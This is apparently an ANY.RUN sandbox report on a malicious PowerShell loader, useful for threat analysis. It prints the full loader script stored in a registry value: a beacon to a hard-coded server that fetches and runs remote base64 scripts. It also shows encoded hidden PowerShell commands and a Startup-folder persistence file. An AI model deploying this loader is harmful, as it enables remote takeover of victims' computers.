ANY.RUN Interactive Sandbox
- Full browser-level visibility into phishing
- Huge database of samples and IOCs
- Interactivity in a safe environment
- Actionable Tier 1 reports
Get full visibility into malware and phishing behavior in a safe environment.
| File name: | cosmali.ps1 |
| Full analysis: | https://app.any.run/tasks/8c167e32-b019-4f73-8883-7207d944a253 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | May 25, 2025, 12:13:24 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines (11766), with CRLF line terminators |
| MD5: | B2CBF8450909A3776DC683768DFB26C7 |
| SHA1: | F1FBEF4367926E3F6FFABCA81E0C133734256175 |
| SHA256: | 3EC43A08B98440DBC3E9CB33BF8DB2EECC2CD174CB547975A32512D573AD053A |
| SSDEEP: | 384:6P32JkTEkL6i8KNbkApkykU/ljQhjqK3DIvg2FKhVcKe8BTMeKz4:6fCVXSHlSjqWkiVgARKs |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2196 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3676 | powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFwAUwBvAGYAdAB3AGEAcgBlAFwAXABNAGkAYwByAG8AcwBvAGYAdABcAFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGMAcwBtAGwAaQAnACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAYAAkAHAAaABhAG4AdABvAG0ALQBjAHMAbQBsAGkAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4000 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4408 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFwAUwBvAGYAdAB3AGEAcgBlAFwAXABNAGkAYwByAG8AcwBvAGYAdABcAFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGMAcwBtAGwAaQAnACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAYAAkAHAAaABhAG4AdABvAG0ALQBjAHMAbQBsAGkAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4652 | C:\WINDOWS\system32\SppExtComObj.exe -Embedding | C:\Windows\System32\SppExtComObj.Exe | — | svchost.exe | |||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: KMS Connection Broker Version: 10.0.19041.3996 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5056 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5344 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\AppData\Local\Temp\cosmali.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6744 | "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent | C:\Windows\System32\slui.exe | SppExtComObj.Exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6944 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UsoUpdate.bat"" | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7052 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (5344) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Search |
| Operation: | write | Name: | $phantom-csmli |
Value: $global:ip_port = "193.32.177.63:5000"
$global:id = get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
$global:ping_timer = 15
$global:job_timeout = 10
#network vars
$global:countrycode = ""
$global:lat = ""
$global:lon = ""
$ErrorActionPreference = "SilentlyContinue"
$ProgressPreference = 'SilentlyContinue'
[System.Net.ServicePointManager]::SecurityProtocol = "Tls, Tls11, Tls12, Ssl3"
class TrustAllCertsPolicy : System.Net.ICertificatePolicy {[bool] CheckValidationResult([System.Net.ServicePoint] $a,[System.Security.Cryptography.X509Certificates.X509Certificate] $b,[System.Net.WebRequest] $c,[int] $d) {return $true}}
[System.Net.ServicePointManager]::CertificatePolicy = [TrustAllCertsPolicy]::new()
function Get-Info {
if ($global:countrycode -eq "" -or $global:lat -eq "" -or $global:lon -eq "") {
$req = Invoke-WebRequest -Uri "http://ip-api.com/json" -useb
if ($req.StatusCode -eq 200) {
$global:countrycode = ($req.Content | ConvertFrom-Json).countryCode
$global:lat = ($req.Content | ConvertFrom-Json).lat
$global:lon = ($req.Content | ConvertFrom-Json).lon
} else {
Start-Sleep -Seconds 100
Get-Info
}
}
$jsonData = @{
"PCINFO" = @{
'hwid' = $global:id
'country_code' = $global:countrycode
'hostname' = $env:COMPUTERNAME
'date' = (Get-Date).ToString()
'lat' = $global:lat
'lon' = $global:lon
}
}
return $jsonData
}
function Main {
Invoke-InitialConnection
while ($true) {
#ClearPowershell
#ClearJobs
Invoke-CheckForCommands
Start-Sleep -Seconds $global:ping_timer
}
}
function LoadScript {
param (
[String]$base64_script
)
try {
$block = [Scriptblock]::Create([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64_script)))
$started_job = Start-Job -ScriptBlock $block -ArgumentList $global:ip_port, $global:id | Wait-Job -Timeout $global:job_timeout
}
catch {
}
}
function Invoke-InitialConnection {
$went_through = $false
while ($went_through -eq $false) {
$jsonData = Get-Info | ConvertTo-Json
$base64_id = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($global:id))
try {
$req = Invoke-WebRequest -Uri "http://$global:ip_port/api/client/$base64_id" -Method POST -Body $jsonData -ContentType "application/json" -UseBasicParsing -ErrorAction Stop
if ($req.StatusCode -eq 200) {
$went_through = $true
$outData = $req.Content | ConvertFrom-Json
if ($outData.new_run -eq $true -and $outData.scripts.Count -gt 0) {
foreach ($script in $outData.scripts) {
LoadScript -base64_script $script
}
}
if ($outData.user_type -eq "new" -and $outData.auto_load -eq $true -and $outData.auto_load_script.Count -gt 0) {
foreach ($script in $outData.auto_load_script) {
LoadScript -base64_script $script
}
}
}
}
catch {
Start-Sleep -Seconds 10
}
}
}
function Invoke-CheckForCommands {
$base64_id = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($global:id))
try {
$req = Invoke-WebRequest -Uri "http://$global:ip_port/api/client/$base64_id" -Method GET -UseBasicParsing -ErrorAction Stop
if ($req.StatusCode -eq 200) {
$outData = $req.Content | ConvertFrom-Json
if ($outData.new_run -eq $true -and $outData.scripts.Count -gt 0) {
foreach ($script in $outData.scripts) {
LoadScript -base64_script $script
}
}
}
}
catch {
}
}
function ClearPowershell {
#Get-Process powershell -ErrorAction SilentlyContinue | ForEach-Object { if ($pid -ne $_.ID) { Stop-Process -Force -Id $_.ID } }
}
function ClearJobs {
Get-Job | Remove-Job -Force
}
Main | |||
| (PID) Process: | (7540) ShellExperienceHost.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\yYpHriFUdyS-r81lKl88jPGlZr-M05PzoCQ_A6O0gXA\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Speech_OneCore\Voices |
| Operation: | write | Name: | DefaultTokenId |
Value: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Speech_OneCore\Voices\Tokens\MSTTS_V110_enUS_DavidM | |||
| (PID) Process: | (7540) ShellExperienceHost.exe | Key: | \REGISTRY\A\{79af0307-96dc-6d79-abf5-ff6943ec723f}\LocalState\ClockFlyoutCache |
| Operation: | write | Name: | 20250427 |
Value: 00000000F365B17E6ECDDB01 | |||
| (PID) Process: | (7540) ShellExperienceHost.exe | Key: | \REGISTRY\A\{79af0307-96dc-6d79-abf5-ff6943ec723f}\LocalState\ClockFlyoutCache |
| Operation: | write | Name: | 20250428 |
Value: 00000000F365B17E6ECDDB01 | |||
| (PID) Process: | (7540) ShellExperienceHost.exe | Key: | \REGISTRY\A\{79af0307-96dc-6d79-abf5-ff6943ec723f}\LocalState\ClockFlyoutCache |
| Operation: | write | Name: | 20250429 |
Value: 00000000F365B17E6ECDDB01 | |||
| (PID) Process: | (7540) ShellExperienceHost.exe | Key: | \REGISTRY\A\{79af0307-96dc-6d79-abf5-ff6943ec723f}\LocalState\ClockFlyoutCache |
| Operation: | write | Name: | 20250430 |
Value: 00000000F365B17E6ECDDB01 | |||
| (PID) Process: | (7540) ShellExperienceHost.exe | Key: | \REGISTRY\A\{79af0307-96dc-6d79-abf5-ff6943ec723f}\LocalState\ClockFlyoutCache |
| Operation: | write | Name: | 20250501 |
Value: 00000000F365B17E6ECDDB01 | |||
| (PID) Process: | (7540) ShellExperienceHost.exe | Key: | \REGISTRY\A\{79af0307-96dc-6d79-abf5-ff6943ec723f}\LocalState\ClockFlyoutCache |
| Operation: | write | Name: | 20250502 |
Value: 00000000F365B17E6ECDDB01 | |||
| (PID) Process: | (7540) ShellExperienceHost.exe | Key: | \REGISTRY\A\{79af0307-96dc-6d79-abf5-ff6943ec723f}\LocalState\ClockFlyoutCache |
| Operation: | write | Name: | 20250503 |
Value: 00000000F365B17E6ECDDB01 | |||
| (PID) Process: | (7540) ShellExperienceHost.exe | Key: | \REGISTRY\A\{79af0307-96dc-6d79-abf5-ff6943ec723f}\LocalState\ClockFlyoutCache |
| Operation: | write | Name: | 20250504 |
Value: 00000000F365B17E6ECDDB01 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 5344 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10b44e.TMP | binary | |
MD5:D040F64E9E7A2BB91ABCA5613424598E | SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670 | |||
| 5344 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2brketc5.xlq.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5344 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zr4d253g.kdx.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 3676 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hxnr3zsu.qqz.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4408 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0s23u2y1.bxo.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5344 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZZS3B1L9MPEY9VD31MKL.temp | binary | |
MD5:6E5AC0BDAC303B2667F6D2E478EBE698 | SHA256:86DC634D4314D826ADCE01189FC392F7CDA1F1B8818BED270E3D9C2B367061DA | |||
| 4408 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2yhgu2pr.z2l.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5344 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary | |
MD5:6E5AC0BDAC303B2667F6D2E478EBE698 | SHA256:86DC634D4314D826ADCE01189FC392F7CDA1F1B8818BED270E3D9C2B367061DA | |||
| 5344 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UsoUpdate.bat | text | |
MD5:862DE986E4D2F4C03897DCE034778C42 | SHA256:30F8F7DE058A08A05E03259838FAF25AE6F15EE9E3603284CDCF53BC04EA1ED0 | |||
| 3676 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_oobwvyjb.emw.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5496 | MoUsoCoreWorker.exe | GET | 200 | 2.19.198.194:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | DE | binary | 825 b | whitelisted |
— | — | GET | 200 | 2.16.253.202:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | NL | binary | 868 b | whitelisted |
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | DE | binary | 471 b | whitelisted |
4408 | powershell.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/json | US | binary | 323 b | whitelisted |
5496 | MoUsoCoreWorker.exe | GET | 200 | 2.16.253.202:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | NL | binary | 868 b | whitelisted |
2104 | svchost.exe | GET | 200 | 2.19.198.194:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | DE | binary | 825 b | whitelisted |
5344 | powershell.exe | GET | 200 | 188.114.97.3:80 | http://cf-cap-load.cfd/static/startup.bat | NL | text | 559 b | unknown |
3676 | powershell.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/json | US | binary | 323 b | whitelisted |
7440 | SIHClient.exe | GET | 200 | 2.16.253.202:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | NL | binary | 407 b | whitelisted |
7440 | SIHClient.exe | GET | 200 | 2.16.253.202:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | NL | binary | 419 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
2104 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
2104 | svchost.exe | 2.19.198.194:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | 2.19.198.194:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
5496 | MoUsoCoreWorker.exe | 2.16.253.202:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
— | — | 2.16.253.202:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
5496 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
3216 | svchost.exe | 172.211.123.248:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
cf-cap-load.cfd |
| unknown |
ocsp.digicert.com |
| whitelisted |
ip-api.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
5344 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
2196 | svchost.exe | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Check (ip-api .com) |
4408 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
4408 | powershell.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup ip-api.com |
2196 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com) |
3676 | powershell.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup ip-api.com |
3676 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
5344 | powershell.exe | Potentially Bad Traffic | ET ATTACK_RESPONSE PowerShell NoProfile Command Received In Powershell Stagers |